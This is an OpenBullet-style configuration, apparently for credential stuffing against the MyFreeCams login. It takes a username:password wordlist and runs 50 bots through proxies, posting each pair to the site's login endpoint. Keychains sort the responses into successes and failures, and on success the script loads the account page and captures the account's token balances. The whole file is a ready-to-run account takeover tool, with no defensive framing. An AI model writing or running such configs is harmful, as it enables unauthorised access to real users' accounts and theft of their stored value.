[SETTINGS]
{
  "Name": "MyFreeCams",
  "SuggestedBots": 50,
  "LastModified": "2018-06-04T21:51:31.0220359+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#POST REQUEST POST "https://www.myfreecams.com/php/login.php" AutoRedirect=TRUE 
  CONTENT "submit_login=100&uid=1&tz=-7&ss=1366x768&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Please include your username" 
    KEY "Your username or password are incorrect" 
  KEYCHAIN Success OR 
    KEY "2032" 
    KEY "login_complete" 
REQUEST GET "https://www.myfreecams.com/?login_alert=1%26myfreecamscom" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
REQUEST GET "https://www.myfreecams.com/php/account.php?request=status&vcc=1527930908" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "<span id=token_volume></span>" 
#PARSE_CURRENT PARSE "<SOURCE>" CSS "#token_volume" "innerHTML" 0 -> CAP "Current Token Volume" "" "" 
PARSE "<SOURCE>" CSS "#token_storage_volume" "innerHTML" 0 -> CAP "Token Storage Volume" "" "" 
